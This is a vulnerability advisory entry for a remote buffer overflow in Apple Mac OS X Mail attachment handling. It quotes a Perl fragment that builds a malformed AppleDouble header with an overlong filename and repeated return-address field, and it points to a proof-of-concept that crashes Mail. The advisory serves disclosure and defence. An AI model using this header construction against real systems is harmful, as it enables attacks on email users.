|
Apple Mac OS X Mail Message Attachment Remote Buffer Overflow Vulnerability
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com The following AppleDouble header Perl code segment will reportedly aid in creating a file capable of triggering this issue by crashing the vulnerable application: "\x00\x05\x16\x07". # AppleDouble Magic Number "\x00\x02\x00\x00". # Version 2 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler "\x00\x03\x00\x00". # Number of entries (3) "\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info' "\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e "\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10 "\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name' "\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48 "\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245 "\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork' "\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d "\x05\x3a\x00\x00". # Length of Resource fork is 0x053a "\x00\x00\x00\x00". # <null> filler "\x00\x00\x00\x00". # <null> filler "A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above. An attachment with this AppleDouble header will reportedly appear with a filename of 'AAAAAAAAAAA...mov'. A proof-of-concept Perl exploit designed to create and send email containing an attachment sufficient to crash Apple Mail is provided by Kevin Finisterre <kf_lists@digitalmunition.com>. |
|
|
Privacy Statement |
